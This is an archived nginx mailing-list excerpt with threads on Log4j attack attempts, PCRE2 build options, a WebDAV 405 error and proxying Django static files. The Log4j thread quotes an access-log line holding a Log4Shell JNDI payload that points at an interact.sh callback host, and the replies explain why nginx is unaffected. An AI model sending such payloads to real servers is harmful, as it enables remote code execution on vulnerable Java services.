opinion, is this the case to ?fix? this behaviour (but I don?t know how, I?m a newbie, sorry) or I should simply ignore it? >> Many thanks again, >> Mauro >>> On 29 Dec 2021, at 19:29, Maxim Dounin wrote: >>> >>> Hello! >>> >>> On Wed, Dec 29, 2021 at 03:55:35PM +0100, Mauro Tridici wrote: >>> >>>> I have an old instance of NGINX (v.1.10.1) running as proxy >>>> server on a dedicated hardware platform. >>>> Since the proxy service is reachable from internet, it is >>>> constantly exposed to cyber attacks. >>>> In my particular case, it is attacked by a lot of Log4j attack >>>> attempts from several malicious IPs. >>>> >>>> At this moment, an host intrusion detection system (HIDS) is >>>> running and is protecting the NGINX server: it seems it is >>>> blocking every malicious attack attempts. >>>> Anyway, during the last attack mail notification sent by the >>>> HIDS, I noticed that the NGINX server response was ?HTTP/1.1 >>>> 200? and I?m very worried about it. >>>> Log4j and Java packages are NOT installed on the NGINX server >>>> and all the servers behind the proxy are not using Log4j. >>>> >>>> Could you please help me to understand the reason why the NGINX >>>> server answer was ?HTTP/1.1 200?!? >>>> >>>> You can see below the mail notification I received: >>>> >>>> >>>> Attack Notification. >>>> 2021 Dec 28 20:45:59 >>>> >>>> Received From: ?hidden_NGINX_server_IP? >>>>> /var/log/nginx/access.log >>>> Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt >>>> detected." >>>> Src IP: 166.137.252.110 >>>> Portion of the log(s): >>>> >>>> 166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET >>>> /?sulgz=${jndi:ldap://?hidden_NGINX_server_IP >>>> ".c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a >>>> } >>>> HTTP/1.1" 200 3700 "-" "curl/7.64.0" ?-" >>> >>> As you can see from the log line, the request is to "/" with some >>> additional request arguments ("?sulgz=..."). As unknown request >>> arguments are usually ignored, it is no surprise that such a >>> request results in 200. >>> >>> -- >>> Maxim Dounin >>> http://mdounin.ru/ >>> _______________________________________________ >>> nginx mailing list >>> nginx at nginx.org >>> http://mailman.nginx.org/mailman/listinfo/nginx >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx > > > -- > Maxim Konovalov From lists at lazygranch.com Thu Dec 30 09:20:27 2021 From: lists at lazygranch.com (lists) Date: Thu, 30 Dec 2021 01:20:27 -0800 Subject: Help request about Log4j attack attempts and NGINX logs meaning In-Reply-To: <04357cfc-3b08-62c6-5ed1-3365f99e6697@nginx.com> Message-ID: <73fk12n5uj8c2f3p70r12qqi.1640856027431@lazygranch.com> This is the list of effected programs. https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md ? Original Message ? From: maxim at nginx.com Sent: December 29, 2021 11:21 PM To: mauro.tridici at cmcc.it Reply-to: nginx at nginx.org Cc: nginx at nginx.org Subject: Re: Help request about Log4j attack attempts and NGINX logs meaning Mauro, Unless you use somewhere in your stack log4j vulnerable software (nginx is not) I don't see anything significant to worry about. Maxim On 29.12.2021 21:34, Mauro Tridici wrote: > Helo Maxim, > > thank you very much for the explanation. > In your opinion, is this the case to ?fix? this behaviour (but I don?t know how, I?m a newbie, sorry)? or I should simply ignore it? > > Many thanks again, > Mauro > >> On 29 Dec 2021, at 19:29, Maxim Dounin wrote: >> >> Hello! >> >> On Wed, Dec 29, 2021 at 03:55:35PM +0100, Mauro Tridici wrote: >> >>> I have an old instance of NGINX (v.1.10.1) running as proxy >>> server on a dedicated hardware platform. >>> Since the proxy service is reachable from internet, it is >>> constantly exposed to cyber attacks. >>> In my particular case, it is attacked by a lot of Log4j attack >>> attempts from several malicious IPs. >>> >>> At this moment, an host intrusion detection system (HIDS) is >>> running and is protecting the NGINX server: it seems it is >>> blocking every malicious attack attempts. >>> Anyway, during the last attack mail notification sent by the >>> HIDS, I noticed that the NGINX server response was ?HTTP/1.1 >>> 200? and I?m very worried about it. >>> Log4j and Java packages are NOT installed on the NGINX server >>> and all the servers behind the proxy are not using Log4j. >>> >>> Could you please help me to understand the reason why the NGINX >>> server answer was ?HTTP/1.1 200?!? >>> >>> You can see below the mail notification I received: >>> >>> >>> Attack Notification. >>> 2021 Dec 28 20:45:59 >>> >>> Received From: ?hidden_NGINX_server_IP? >>>> /var/log/nginx/access.log >>> Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt >>> detected." >>> Src IP: 166.137.252.110 >>> Portion of the log(s): >>> >>> 166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET >>> /?sulgz=${jndi:ldap://?hidden_NGINX_server_IP >>> ".c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a >>> } >>> HTTP/1.1" 200 3700 "-" "curl/7.64.0" ?-" >> >> As you can see from the log line, the request is to "/" with some >> additional request arguments ("?sulgz=...").? As unknown request >> arguments are usually ignored, it is no surprise that such a >> request results in 200. >> >> -- >> Maxim Dounin >> http://mdounin.ru/ >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx -- Maxim Konovalov _______________________________________________ nginx mailing list nginx at nginx.org http://mailman.nginx.org/mailman/listinfo/nginx From nginx-forum at forum.nginx.org Fri Dec 31 05:49:38 2021 From: nginx-forum at forum.nginx.org (George) Date: Fri, 31 Dec 2021 00:49:38 -0500 Subject: nginx-1.21.5 In-Reply-To: References: Message-ID: Maxim Dounin Wrote: ------------------------------------------------------- > Hello! > > On Wed, Dec 29, 2021 at 11:30:04PM -0500, George wrote: > > > Thanks for PCRE2 support! > > > > From what I read Nginx 1.21.5 will default to PCRE2 if found or > fallback to > > PCRE if not > > > > You can disable PCRE2 default by passing --without-pcre2 flag - > which works > > fine and > > > > ldd $(which nginx) > > > > shows > > > > libpcre.so.1 => /usr/local/nginx-dep/lib/libpcre.so.1 > (0x00007f86c7445000) > > > > But is the same true, if you set --without-pcre flag with PCRE2 > library > > installed and detected? As that seems to end up with nginx failing > to > > configure > > > > ./configure: error: the HTTP rewrite module requires the PCRE > library. > > You can either disable the module by using > --without-http_rewrite_module > > option or you have to enable the PCRE support. > > > > Why is it looking for PCRE when PCRE2 is available? > > The "--without-pcre" configure option completely disables usage of > all versions of the PCRE library, both the original PCRE library > and PCRE2. > > Currently there is not option to disable the original PCRE library > while still using PCRE2. Note though that the original PCRE > library is not used as long as PCRE2 is available. That is, the > only potential difference such an option might introduce is what > happens if PCRE2 is not available: either nginx configure will > fail, or fallback to using the original PCRE library. > > -- > Maxim Dounin > http://mdounin.ru/ > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx Thanks Maxim for the clarification :) So far Nginx 1.21.5 with PCRE2 works fine from my tests with exception of Nginx Lua and ModSecurity Nginx modules being incompatible right now :) Posted at Nginx Forum: https://forum.nginx.org/read.php?2,293170,293214#msg-293214 From nginx-forum at forum.nginx.org Fri Dec 31 11:59:46 2021 From: nginx-forum at forum.nginx.org (BonVonKnobloch) Date: Fri, 31 Dec 2021 06:59:46 -0500 Subject: Setting up a webDAV server Message-ID: Hi, I am new to nginx and am trying to get a simple webDAV server running. I can use GET to read files, but PUT fails. Using opensuse 15.3. '# nginx -V nginx version: nginx/1.20.2 built by gcc 7.5.0 (SUSE Linux) configure arguments: --with-http_dav_module' nginx.conf is as supplied with the following added in 'server': location /html/calendar { root html/calendar; dav_methods PUT DELETE MKCOL COPY MOVE; dav_access group:rw all:r; } and the user changed to 'nginx' After an unsuccessful PUT, wireshark shows: 'No. Time Source Destination Protocol Length Info 17 5.918827416 172.21.42.42 172.21.42.124 HTTP 3133 PUT /calendar/Geburtstage.ics HTTP/1.1 (text/calendar) No. Time Source Destination Protocol Length Info 19 5.918956256 172.21.42.124 172.21.42.42 HTTP 380 HTTP/1.1 405 Not Allowed (text/html) It seems a permissions problem, but I don't know where. Linux permissions: The calendar directory is root:nginx 777 and the calendar files are root:nginx 666 can anyone point me to a starting point? Many thanks, Robert von Knobloch. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,293215,293215#msg-293215 From mdounin at mdounin.ru Fri Dec 31 14:48:41 2021 From: mdounin at mdounin.ru (Maxim Dounin) Date: Fri, 31 Dec 2021 17:48:41 +0300 Subject: Setting up a webDAV server In-Reply-To: References: Message-ID: Hello! On Fri, Dec 31, 2021 at 06:59:46AM -0500, BonVonKnobloch wrote: > I am new to nginx and am trying to get a simple webDAV server running. > I can use GET to read files, but PUT fails. > Using opensuse 15.3. [...] > nginx.conf is as supplied with the following added in 'server': > > location /html/calendar { > root html/calendar; > dav_methods PUT DELETE MKCOL COPY MOVE; > dav_access group:rw all:r; > > } > and the user changed to 'nginx' > > After an unsuccessful PUT, wireshark shows: > 'No. Time Source Destination Protocol Length Info > 17 5.918827416 172.21.42.42 172.21.42.124 HTTP 3133 PUT > /calendar/Geburtstage.ics HTTP/1.1 (text/calendar) You've configured DAV methods for "/html/calendar", but try to use it in "/calendar/...". -- Maxim Dounin http://mdounin.ru/ From nginx-forum at forum.nginx.org Fri Dec 31 22:45:07 2021 From: nginx-forum at forum.nginx.org (ningja) Date: Fri, 31 Dec 2021 17:45:07 -0500 Subject: django app static files on the different server not get loaded Message-ID: I have two server test1.com and test2.com. test1 is internet public face server. Test2 is intranet only server. Both servers have nginx docker running. Test1 run a Django app1 which has static files under /app/public/static. App1 can load the static files and run correctly from URL https://test1.com/app1. Test2 has a Django app2 which has static files under /app/public/static on server test2. From URL https://test2.com/app2. Every thing works include static files. The issue is I need config nginx1 to allow people to access app2 from internet.(public) With the configuration nginx1 blow I can load the app2 but not the app2 static files. The error is : "GET /static/img/logo-2.jpg HTTP/1.1", host: "test1.com", referrer: https://test1.com/app2/ . The nginx is looking for app2 static file under test1 which obviously ?file not found?. How can config nginx1 to looking for app2 static file under test2.com https://test2.com/app2/? user nginx; worker_processes 1; error_log /var/log/nginx/error.log warn; pid /var/run/nginx.pid; events { worker_connections 1024; } http { include /etc/nginx/mime.types; default_type application/octet-stream; client_max_body_size 50m; log_format main '$remote_addr - $remote_user [$time_local] "$request" ' '$status $body_bytes_sent "$http_referer" ' '"$http_user_agent" "$http_x_forwarded_for"'; access_log /var/log/nginx/access.log main; error_log /var/log/nginx/error.log; sendfile on; keepalive_timeout 65; map $http_upgrade $connection_upgrade { default upgrade; '' close; } upstream app { server django:5000; } server { listen 443 ssl; server_name test1.com; charset utf-8; root /app/public; # static files location / { try_files $uri @proxy_to_app ; } # prevent XSS, clickjacking, never cache add_header "X-Frame-Options" "SAMEORIGIN"; add_header "X-Content-Type-Options" "nosniff"; add_header "X-XSS-Protection" "1; mode=block"; add_header "Pragma" "no-Cache"; add_header "Cache-Control" "no-Store,no-Cache"; # app1 static location /static/ { expires 1d; access_log off; add_header "Cache-Control" "public"; add_header "Pragma" "public"; } #app2 location /app2/ { proxy_pass https://test2.com:444; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection $connection_upgrade; proxy_redirect off; } # django location @proxy_to_app { proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header X-Forwarded-Proto $scheme; proxy_set_header Host $http_host; proxy_redirect off; proxy_pass http://app; } } //end of test1 server #test2 server server{ listen 444; server_name https://test2.com; root /app/public; # static files location / { try_files $uri @proxy_to_app ; } # except anything in static location /static/ { expires 1d; access_log off; add_header "Cache-Control" "public"; add_header "Pragma" "public"; } }#end of test2 # redirect http to https server { listen 80; server_name test1.com; return 301 https://test1.com$request_uri; } # only valid HTTP_HOST header should be used server { listen 80 default_server; return 403; } } Posted at Nginx Forum: https://forum.nginx.org/read.php?2,293219,293219#msg-293219